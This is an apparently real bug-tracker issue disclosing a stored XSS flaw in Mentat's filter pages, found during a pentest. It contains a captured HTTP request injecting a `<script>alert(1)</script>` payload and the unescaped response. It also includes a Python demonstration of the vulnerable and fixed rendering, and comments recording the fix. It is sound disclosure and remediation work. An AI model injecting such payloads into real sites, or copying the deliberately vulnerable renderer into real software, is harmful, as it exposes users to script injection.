Bug #7571

closed

XSS at stored filters

Added by Pavel Kácha about 2 years ago. Updated almost 2 years ago.

Status: Closed
Priority: High
Category: Development - GUI
Target version:
Start date: 03/22/2022
Due date:
% Done: 100%
Estimated time:
To be discussed:
Description

POST /mentat/filters/60/update HTTP/1.1
Host: mentat-hub.cesnet.cz
Cookie: session=.eJxxxbbd4e651a
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 525
Origin: https://mentat-hub.cesnet.cz
Referer: https://mentat-hub.cesnet.cz/mentat/filters/60/update
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

name=egi+ftp+exclusion&description=exclude+detections+generated+by+elmo+towards+egi+ftp&type=advanced&filter=Category+IN+%5B%22Recon.Scanning%22%2C+%22a%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb%22%5D+AND+Target.IP4+IN+%5B%22193.62.192.0%2F21%22%2C+%22130.14.0.0%2F16%22%5D&categories=Recon.Scanning&ips=&enabled=True&valid_from=&valid_to=&next=https%3A%2F%2Fmentat-hub.cesnet.cz%2Fmentat%2Ffilters%2F60%2Fshow&csrf_token=IjJjNmZjZDZkY2ZhNzY0ZWQwM2MzNzQ2YzMyMTcxMzNiNWQxMjk3NTQi.Yh368w.aGotI4Oy-WR6Zwb49G_vXyY9IpQ&submit=Submit

HTTP/1.1 302 FOUND
Date: Tue, 01 Mar 2022 10:52:44 GMT
Server: Apache/2.4.38 (Debian)

GET /mentat/filters/60/show HTTP/1.1
Host: mentat-hub.cesnet.cz
Cookie: session=.eJxNxxxxbd4e651a
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://mentat-hub.cesnet.cz/mentat/filters/60/update
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2022 10:52:44 GMT
Server: Apache/2.4.38 (Debian)
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

<li class="pynspect-rule-list-item"><div class="pynspect-rule-constant pynspect-rule-constant-string">&quot;a<script>alert(1)</script>b&quot;</div>
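The captured response shows the defect: the string constant from the stored filter is written into the `pynspect-rule-constant` markup with only the double quotes encoded (`&quot;`), while `<` and `>` from `a<script>alert(1)</script>b` pass through untouched. The snippet below is an added illustration, not Mentat's or pynspect's code; the CSS class names are taken from the capture, the function names and the way a rule's constants are wrapped are assumptions made for the example. It reproduces the observed output, shows the hardened renderer that encodes the whole value, and includes a check that flags any tag in the output that is not one of the expected wrapper tags.

```python
"""Added example (not Mentat's or pynspect's code): reproduce the stored
filter XSS shown in the captured response and show the hardened rendering.
The toy rule structure and function names are assumptions for illustration.
"""
import html
import re

# Payload taken from the report: one member of the Category IN [...] list.
PAYLOAD = 'a<script>alert(1)</script>b'

WRAPPER_OPEN = '<div class="pynspect-rule-constant pynspect-rule-constant-string">'
WRAPPER_CLOSE = '</div>'


def render_constant_vulnerable(value):
    """Mirror the observed output: only '"' is encoded, '<' and '>' pass through."""
    quoted = '"' + value + '"'
    quoted = quoted.replace('"', '&quot;')
    return WRAPPER_OPEN + quoted + WRAPPER_CLOSE


def render_constant_fixed(value):
    """Encode the entire value (&, <, >, ", ') before it enters the markup."""
    quoted = html.escape('"' + value + '"', quote=True)
    return WRAPPER_OPEN + quoted + WRAPPER_CLOSE


def render_list_item(values, render):
    """Wrap the rendered constants of a list expression as in the capture."""
    return ('<li class="pynspect-rule-list-item">'
            + ''.join(render(v) for v in values)
            + '</li>')


# The only tags a rendered constant list is allowed to contain.
WRAPPER_TAGS = re.compile(r'</?(?:li|div)(?:\s+class="[^"]*")?>')


def foreign_tags(rendered):
    """Return every tag in the output that is not an expected wrapper tag.

    An empty list means nothing from the stored filter value reached the
    browser as markup; anything else is injected HTML.
    """
    stripped = WRAPPER_TAGS.sub('', rendered)
    return re.findall(r'<[^>]*>', stripped)


if __name__ == '__main__':
    bad = render_list_item([PAYLOAD], render_constant_vulnerable)
    good = render_list_item([PAYLOAD], render_constant_fixed)
    print('vulnerable:', bad)
    print('injected  :', foreign_tags(bad))
    print('fixed     :', good)
    print('injected  :', foreign_tags(good))
```

Encoding in the renderer is what matters here: when the surrounding template treats the rendered rule as already-safe markup (the usual way a pre-rendered HTML fragment is inserted), the template engine's auto-escaping no longer protects the constant, so the fragment must be safe on its own. The `foreign_tags` check is a cheap regression test for exactly that: feed it the stored filter value from the report and require an empty result.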

Related issues

Related to Mentat - Bug #7584: Filters allow illegal values and fail with 500 internal server error (Closed, Rajmund Hruška, 05/10/2022)

#1

Updated by Pavel Kácha about 2 years ago

FLAB Pentest 2022-03 no. 34

#2

Updated by Rajmund Hruška almost 2 years ago

  • To be discussed changed from No to Yes
#3

Updated by Rajmund Hruška almost 2 years ago

  • Status changed from New to Resolved
  • % Done changed from 0 to 100

The error was fixed in https://gitlab.cesnet.cz/709/mentat/pynspect/-/merge_requests/9. I raised the required pynspect version and tested the filters on mentat-alt. This issue seems to be resolved.

The other issue which I came across is #7584.

#4

Updated by Rajmund Hruška almost 2 years ago

  • Related to Bug #7584: Filters allow illegal values and fail with 500 internal server error added
#5

Updated by Rajmund Hruška almost 2 years ago

  • Status changed from Resolved to In Review
#6

Updated by Rajmund Hruška almost 2 years ago

  • To be discussed deleted (Yes)
#7

Updated by Pavel Kácha almost 2 years ago

  • Target version changed from 2.10 to 2.9.1
#8

Updated by Pavel Kácha almost 2 years ago

  • Status changed from In Review to Closed